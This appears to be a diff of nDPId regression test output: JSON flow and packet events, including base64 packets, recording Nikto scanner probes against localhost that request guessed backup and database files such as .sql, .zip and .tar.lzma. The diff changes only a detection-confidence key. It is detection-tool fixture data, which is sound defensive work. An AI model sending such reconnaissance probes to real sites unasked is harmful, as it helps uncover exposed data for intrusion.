{"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
